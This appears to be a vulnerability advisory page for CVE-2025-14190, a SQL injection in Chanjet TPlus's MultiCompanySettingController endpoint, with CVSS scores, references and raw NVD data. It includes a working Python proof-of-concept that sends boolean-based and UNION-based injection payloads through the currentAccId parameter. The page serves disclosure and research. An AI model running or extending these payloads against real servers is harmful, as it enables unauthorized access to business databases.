CVE-2025-14190

Description

A flaw has been found in Chanjet TPlus up to 20251121. Affected by this vulnerability is an unknown functionality of the file /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load. This manipulation of the argument currentAccId causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Chanjet TPlus <= 2025-11-21

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14190 SQL Injection PoC for Chanjet TPlus
# Target: /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx

def exploit_sql_injection(target_url, payload):
    """
    Exploit SQL injection vulnerability in Chanjet TPlus currentAccId parameter
    """
    params = {
        'method': 'Load'
    }
    
    # Malicious payload in currentAccId parameter
    data = {
        'currentAccId': payload
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-AjaxPro-Method': 'Load'
    }
    
    try:
        response = requests.post(
            target_url,
            params=params,
            data=data,
            headers=headers,
            timeout=30
        )
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Request failed: {str(e)}"

# Example payloads
if __name__ == "__main__":
    target = "http://target.com/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx"
    
    # Boolean-based blind SQL injection
    payload = "1' AND 1=1--"
    print("Testing boolean-based injection...")
    result = exploit_sql_injection(target, payload)
    print(result)
    
    # UNION-based injection to extract database version
    union_payload = "1' UNION SELECT @@version--"
    print("Extracting database version...")
    result = exploit_sql_injection(target, union_payload)
    print(result)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14190
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14190
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14190/
[4] VulDB https://vuldb.com/cve/CVE-2025-14190
[5] https://github.com/hacker-routing/Changjetong-T-/issues/1
[6] https://github.com/hacker-routing/Changjetong-T-/issues/1#issue-3646765351
[7] https://vuldb.com/?ctiid.334610
[8] https://vuldb.com/?id.334610
[9] https://vuldb.com/?submit.699144

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14190", "sourceIdentifier": "[email protected]", "published": "2025-12-07T13:15:58.487", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Chanjet TPlus up to 20251121. Affected by this vulnerability is an unknown functionality of the file /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load. This manipulation of the argument currentAccId causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/hacker-routing/Changjetong-T-/issues/1", "source": "[email protected]"}, {"url": "https://github.com/hacker-routing/Changjetong-T-/issues/1#issue-3646765351", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334610", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334610", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.699144", "source": "[email protected]"}]}}